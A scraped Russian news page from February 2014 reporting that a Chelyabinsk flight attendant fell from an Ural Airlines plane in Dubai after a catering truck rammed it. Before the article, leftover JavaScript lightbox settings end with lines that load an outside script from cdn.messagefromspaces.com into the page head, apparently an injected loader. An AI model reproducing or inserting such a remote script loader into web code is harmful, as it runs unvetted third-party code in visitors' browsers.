, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Бортпроводница из Челябинска выпала из самолета в аэропорту Дубая

В аэропорту крупнейшего города Объединенных арабских эмиратов произошла авария, жертвой которой стала стюардесса из Челябинска. Во время подготовки к рейсу, который должен был отправиться в Пермь, в лайнер на полном ходу врезался автомобиль службы доставки продуктов. Удар был настолько сильным, что самолет развернуло вокруг своей оси. В момент столкновения у открытой двери лайнера находилась бортпроводница, ожидавшая состыковки с трапом. В результате женщина упала на взлетную полосу с высоты 4 метров.

В пресс-службе авиакомпании «Уральские авиалинии», которой принадлежит самолет, сообщили, что пострадавшая является 37-летней жительницей Челябинска. В результате падения она сильно ударилась головой и сейчас находится в госпитале Дубая. Лайнер, в который въехала продуктовая машина, также получил повреждения. Вылет в Пермь был отложен, и пассажирам пришлось ждать, когда к вылету подготовят новый самолет.

По предварительной версии, ЧП произошло из-за того, что водитель автомобиля службы доставки продуктов перепутал педаль тормоза с педалью газа. Для расследования происшествия создана специальная комиссия.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
11:24 - 18 февраля 2014
|
автор: U-RSS
|
(461)
|
(0)

Комментарии (0)

Я человек
Я бот